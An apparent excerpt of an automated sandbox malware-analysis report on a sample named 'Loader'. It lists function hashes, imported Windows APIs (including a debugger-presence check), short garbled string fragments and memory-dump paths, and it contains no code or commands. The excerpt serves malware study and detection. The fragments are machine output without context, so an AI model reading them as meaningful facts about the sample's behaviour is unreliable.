                                                                                          • Opcode ID: aad4ed34b6b8937640fc418f1bd5716332bbbd073c7fa13329e49a27b28839b2
                                                                                          • Instruction ID: 6e8e3c78a983155e02cc1323484678d4ee17ecb08e1dc2ec05e73b2a630c425a
                                                                                          • Opcode Fuzzy Hash: aad4ed34b6b8937640fc418f1bd5716332bbbd073c7fa13329e49a27b28839b2
                                                                                          • Instruction Fuzzy Hash: 34517372A00A19ABDF12DFA5CCC1ABEB7B9FF04700F054569E941EB190EB749940DB62
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00423900
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,998682E1), ref: 004239C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: _A$QS
                                                                                          • API String ID: 237503144-425339690
                                                                                          • Opcode ID: 4762ee07f7709c5bcd6f4bf0c8ec826581c1f83c059e326cb24f1ab0a6b071cb
                                                                                          • Instruction ID: ff13ee4a08f2bc40c02b98611d89e7d10dbb1fafe05ff50cca4a939355d2c245
                                                                                          • Opcode Fuzzy Hash: 4762ee07f7709c5bcd6f4bf0c8ec826581c1f83c059e326cb24f1ab0a6b071cb
                                                                                          • Instruction Fuzzy Hash: 50A1F0B66183109BE310CF25EC8171BBBE1FBC6318F048A3DF9949B391D7B599058B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 74$Bt$Kq$WD$D:
                                                                                          • API String ID: 0-3575891768
                                                                                          • Opcode ID: 8b69e38a951d46793538621483d2774adb47c41ab40b947929baeac8a2f04a7c
                                                                                          • Instruction ID: f5160d97b9eac11fab9500262d1b66c28d53c3fa8702a8ff15d64c5c26f1ec96
                                                                                          • Opcode Fuzzy Hash: 8b69e38a951d46793538621483d2774adb47c41ab40b947929baeac8a2f04a7c
                                                                                          • Instruction Fuzzy Hash: D8E14676A183218BD728CF25C85136BB7E2FFD5314F08892DD9C28B385E7789805CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!A$/$1,$WQ%M$x~ly
                                                                                          • API String ID: 0-1076345736
                                                                                          • Opcode ID: df7137c20f6d98db71fd7f9cd5ab8673dccb301e0d52dc62b0ac4a7c1e4ba469
                                                                                          • Instruction ID: c81af30fa47a614f92e316ab3865125c2c0ebe1d49a083b5cf17de503e1f0e37
                                                                                          • Opcode Fuzzy Hash: df7137c20f6d98db71fd7f9cd5ab8673dccb301e0d52dc62b0ac4a7c1e4ba469
                                                                                          • Instruction Fuzzy Hash: BE512B7160C3E18BD3058B2A94A037BFFE19FE7701F68845EE5D15B382D67988058BA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!A$/$1,$WQ%M$x~ly
                                                                                          • API String ID: 0-1076345736
                                                                                          • Opcode ID: ef50efb5b4acaef2404ef908d4d049a33927374b76c53d0c1120b1c30fb30d09
                                                                                          • Instruction ID: 6becc890d84fb257d89dfee27970379ddd0fc9186fd5d0e68907015a65abed32
                                                                                          • Opcode Fuzzy Hash: ef50efb5b4acaef2404ef908d4d049a33927374b76c53d0c1120b1c30fb30d09
                                                                                          • Instruction Fuzzy Hash: ED512B70A0C3E18BD3158B2A94A037BFFD19FE7701F68845EE5D157381D67988058BA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 48d6f57b6ee1e8824939b0848cafb3657513b2c9f968159c9322018781552e0c
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: 6B0239B1E012199FDF15CFA9C9C06AEBBF1FF48314F258269E519EB340D731AA458B90
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033B849
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: 022e1ee2eac435a8ee6d69c3acf917323cd75c433a345e70557a0b8c9bfebe4d
                                                                                          • Instruction ID: 7e4df040740b1b120c87295b99a65c481f81b9c52139c25a386b1eafcd0ec2ca
                                                                                          • Opcode Fuzzy Hash: 022e1ee2eac435a8ee6d69c3acf917323cd75c433a345e70557a0b8c9bfebe4d
                                                                                          • Instruction Fuzzy Hash: 3071A1719051689FDF22AF28CCCABAAF7B9EF45300F5541D9E249AB211EB315E849F10
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00329A3F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00329B0B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00329B24
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00329B2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 1115dd5648234f72b9b65155925bfacc83765900ad2d0dcec611b4a2bbf427e8
                                                                                          • Instruction ID: 31a72b661b3766789a40f01430f1e21cfe9944fd0521edee2eb6d5963ad5d7a1
                                                                                          • Opcode Fuzzy Hash: 1115dd5648234f72b9b65155925bfacc83765900ad2d0dcec611b4a2bbf427e8
                                                                                          • Instruction Fuzzy Hash: 88310A75D01228DBDF61EF64D9497CDBBB8BF08700F1041EAE40CAB250EB749A848F45
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: _`$vm#b
                                                                                          • API String ID: 3664257935-1728712856
                                                                                          • Opcode ID: e53f08ddf99994442553c084195a65b1456403216c45deaff13bb5ab18a3460d
                                                                                          • Instruction ID: c3b53cb5a17e9d19d5249ff015162dbf28cf73674390ba62343818fa9bc44c10
                                                                                          • Opcode Fuzzy Hash: e53f08ddf99994442553c084195a65b1456403216c45deaff13bb5ab18a3460d
                                                                                          • Instruction Fuzzy Hash: 325114716483829FD3158F25D89176BBFE1AFD2310F18992DE1D68B281DB7888058B57
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$07Y$gfff
                                                                                          • API String ID: 0-3731902943
                                                                                          • Opcode ID: 9a038d0fdd0153f5bf756e2ced00d44fafd22744d4e1503639a27f9596a22375
                                                                                          • Instruction ID: 26db738034a22c520161b30420a9933d2acc67b269f448894966435822cf2757
                                                                                          • Opcode Fuzzy Hash: 9a038d0fdd0153f5bf756e2ced00d44fafd22744d4e1503639a27f9596a22375
                                                                                          • Instruction Fuzzy Hash: DAC14A3060A3418BC7258F28C4912A7BBF2EFD6320F18855EE5D18B391E33D9855C75B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9$>0$x
                                                                                          • API String ID: 0-1232632554
                                                                                          • Opcode ID: 3e016b760f0ba3c9620baf6b90ad7076c84c82c3e05c1fa2d5428d8f1798b52d
                                                                                          • Instruction ID: a15ceac8e34a6d6ead5daf2351f5c682b3a1cfda95a6a2be99d7c9f15c15af21
                                                                                          • Opcode Fuzzy Hash: 3e016b760f0ba3c9620baf6b90ad7076c84c82c3e05c1fa2d5428d8f1798b52d
                                                                                          • Instruction Fuzzy Hash: 249123B5A043219BD7209F24DC82B67B3B0EFD5354F08852EF9899B391E778E801C75A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$[_$fY
                                                                                          • API String ID: 0-733380153
                                                                                          • Opcode ID: 51856e5099c74df1fc07e65b7bda08bc62192bdcf520bf499ebd3990fdc9bd96
                                                                                          • Instruction ID: e600800951c0d246200edf198352cbf1854996a72d2edab27a39a4e0f7ee8b1f
                                                                                          • Opcode Fuzzy Hash: 51856e5099c74df1fc07e65b7bda08bc62192bdcf520bf499ebd3990fdc9bd96
                                                                                          • Instruction Fuzzy Hash: 4AA19BB1118340CBD3288F24C8A1BABBBF1FF86354F09595DE4865F3A1E7798845CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D]+\$RAA
                                                                                          • API String ID: 0-2997780931
                                                                                          • Opcode ID: 34c27bd9d1288e6d173f317dd7ee89ea1b07e6df424be4839f1b6e0f8a31b356
                                                                                          • Instruction ID: 65781ec4038b74b51e0c428162170844e7c8db529c6f3fe48934e8f45840f545
                                                                                          • Opcode Fuzzy Hash: 34c27bd9d1288e6d173f317dd7ee89ea1b07e6df424be4839f1b6e0f8a31b356
                                                                                          • Instruction Fuzzy Hash: 0D527679608301DBD7189F19EC41BBB73E2EBC6315F05483EE88597282E7389D42C78A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 79$AY[g
                                                                                          • API String ID: 0-767607040
                                                                                          • Opcode ID: 75940066473ea754df7debfb61beb5f349bdf3c574ea88399dab23c11acdc1af
                                                                                          • Instruction ID: 2378d829f951076b51066a7ac086adcacedc0a2d49c7517852f85ee3cb7ca400
                                                                                          • Opcode Fuzzy Hash: 75940066473ea754df7debfb61beb5f349bdf3c574ea88399dab23c11acdc1af
                                                                                          • Instruction Fuzzy Hash: 188118616483819FD315CF2984907ABBFE1AFD7301F0889ADE4D58B382D23D890EC756
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: cdb93f8508b33442bc4b86824c012b887ad7add5c49574bd6d2b58a9ae40dab9
                                                                                          • Instruction ID: f250adcc034ca2d69ec01274816afd61d580dd097cb6860af304507c585650cb
                                                                                          • Opcode Fuzzy Hash: cdb93f8508b33442bc4b86824c012b887ad7add5c49574bd6d2b58a9ae40dab9
                                                                                          • Instruction Fuzzy Hash: 4F41232460D7E18ADB328B3994A43F7BBE19F97314F9809ADC4CD9B343CB3904068796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: 806f3c58126dd206b782976f3eab4f1b5fd7efcc072ccba837e147ad8b25bb6e
                                                                                          • Instruction ID: 50480005730b2ed0de741354e1467de79a17c865a4212da3418e2b02d3e8f24a
                                                                                          • Opcode Fuzzy Hash: 806f3c58126dd206b782976f3eab4f1b5fd7efcc072ccba837e147ad8b25bb6e
                                                                                          • Instruction Fuzzy Hash: 9341072420D7E14ADF369B3990643F7BBE19F97314FA8459DC0D94B243CB384406CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: 4b556cf63778863a4b21db29bc6b3fc65a6cbfa19378192689087ff3aa3b68fc
                                                                                          • Instruction ID: 279d10894c9e7d1f9220d9bc0612f94080851a018c3da9949d07ce01a39e61d1
                                                                                          • Opcode Fuzzy Hash: 4b556cf63778863a4b21db29bc6b3fc65a6cbfa19378192689087ff3aa3b68fc
                                                                                          • Instruction Fuzzy Hash: 0631A02410D7E18ADF319B39A0643FBBBE19BA7314F98499DC0DD5B243CB384406CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: f
                                                                                          • API String ID: 2994545307-1993550816
                                                                                          • Opcode ID: 9658deeb176dca335962a4b351641ebaa03433d52079c4468506c1511ecfcf50
                                                                                          • Instruction ID: 64db93ce7ce3cb20fbb1447096579fd07b34ecb83f1d1032b5a205255a4cfaa7
                                                                                          • Opcode Fuzzy Hash: 9658deeb176dca335962a4b351641ebaa03433d52079c4468506c1511ecfcf50
                                                                                          • Instruction Fuzzy Hash: 8C121A31A083518FD718CF2AC89076FB7E2EBC8314F29962DE49597391D738DC068B96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: b>B
                                                                                          • API String ID: 0-1829109149
                                                                                          • Opcode ID: 239827f8904fd884b4320e46c1de81e70ed20015016c700879dc5f8ed3bec6c8
                                                                                          • Instruction ID: a1a1b0d006e0ca039f6644af3c7f2f6a4f5e3df4878b04ca0cc90ce6e8ae6dc8
                                                                                          • Opcode Fuzzy Hash: 239827f8904fd884b4320e46c1de81e70ed20015016c700879dc5f8ed3bec6c8
                                                                                          • Instruction Fuzzy Hash: BCE11432A083228BC714DF29D84066FB3F2FFD4701F59892DE8C597250E7389A46CB99
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Qh
                                                                                          • API String ID: 0-416604385
                                                                                          • Opcode ID: 013369e320ae7dca968d1f3d19f8e395fc4f02e944cc60745db3c7de7d1cbf27
                                                                                          • Instruction ID: 611c37984c01b3c8a3d4b54c24d13f9d27846cd2c0722835c88c2d00e8e561f0
                                                                                          • Opcode Fuzzy Hash: 013369e320ae7dca968d1f3d19f8e395fc4f02e944cc60745db3c7de7d1cbf27
                                                                                          • Instruction Fuzzy Hash: 8AC12675B083108BD724DF25E89267BB3E1EFA1354F58852EE8C297391E738E905C35A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "/(
                                                                                          • API String ID: 0-2843922497
                                                                                          • Opcode ID: 18b78cab4c7369e9d45cc31921eaa90a2d39cd5b09d68d10891896cc9532ca50
                                                                                          • Instruction ID: 138b045e5ea7b3503a6739a2735fe6408bc333a7e413c3dcd1e756a0dc5547fa
                                                                                          • Opcode Fuzzy Hash: 18b78cab4c7369e9d45cc31921eaa90a2d39cd5b09d68d10891896cc9532ca50
                                                                                          • Instruction Fuzzy Hash: 6AB147356883104BD714DF26C881B6BB7E2EBCA314F19A92EE4D157382D339DC16879B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2nA
                                                                                          • API String ID: 0-571203523
                                                                                          • Opcode ID: 497cfef724bb9ac7061a692183e1d4e83dded868f9ea9c9f698713437ff4e0b1
                                                                                          • Instruction ID: 77fdca5c366ee5fb7d436d44c078de1679970444f4c0ea169dc3108eb42a7168
                                                                                          • Opcode Fuzzy Hash: 497cfef724bb9ac7061a692183e1d4e83dded868f9ea9c9f698713437ff4e0b1
                                                                                          • Instruction Fuzzy Hash: C8D12535A08351DBD724CF25D8917ABB7E2FB8A304F05882DE4C997391D738D846CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 0c1408164ed7949986994ce03b00d7f9f6ff7a1cfba4423f7ffe27ec7dc4ff91
                                                                                          • Instruction ID: 377722463409a4d12b2c163946e6c12f40929f760cfd9cb0d738a70ec78ffdec
                                                                                          • Opcode Fuzzy Hash: 0c1408164ed7949986994ce03b00d7f9f6ff7a1cfba4423f7ffe27ec7dc4ff91
                                                                                          • Instruction Fuzzy Hash: A7C113B1B043215BD7118E24E450B6BB7E6AF84354F99892EE89587381E738EC15C7CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction ID: 457bcc4734e36970056bd64e4885e605d8806025b2c38a961ce7be2c02d729d8
                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction Fuzzy Hash: 0571F832B083358BD714CE29E88431FB7E2EBC5710FA9856EE8949B355D3389C4587DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 72Y
                                                                                          • API String ID: 0-564303654
                                                                                          • Opcode ID: 5385e5880359d5ccb39f7219a55c28a6b68bb3476fdd8c12494410843071b7eb
                                                                                          • Instruction ID: 4337ef944046a775e373f072c0b24e9e38e84af2be772ab16b974ff372caf755
                                                                                          • Opcode Fuzzy Hash: 5385e5880359d5ccb39f7219a55c28a6b68bb3476fdd8c12494410843071b7eb
                                                                                          • Instruction Fuzzy Hash: 4021673454C3119BD725CF20CC51AAABBF1EF96305F008A6EE5D9A72E2D3398846C7C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5da75524e788767ec64699ac96ea130612297a95f7daa9a7f92c01636c847ed
                                                                                          • Instruction ID: beba566f0c337e03e94a8d121a5db6c50dfc4ba255997064a0c903c7420b2622
                                                                                          • Opcode Fuzzy Hash: b5da75524e788767ec64699ac96ea130612297a95f7daa9a7f92c01636c847ed
                                                                                          • Instruction Fuzzy Hash: D852F4715083458FCB14CF24C0906AABFE1BF89315F18867EF8996B391D778DA49CB89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ad0fa8146068bfe6562e592e38a34688227262f4c6a26b4ec59bef795a2e62d
                                                                                          • Instruction ID: eff02e85cc14c1dea4739ce563387e8ed064339514d4c01d2dd91a6366e39f0e
                                                                                          • Opcode Fuzzy Hash: 5ad0fa8146068bfe6562e592e38a34688227262f4c6a26b4ec59bef795a2e62d
                                                                                          • Instruction Fuzzy Hash: D422A331A087118BC725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B855CB87
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
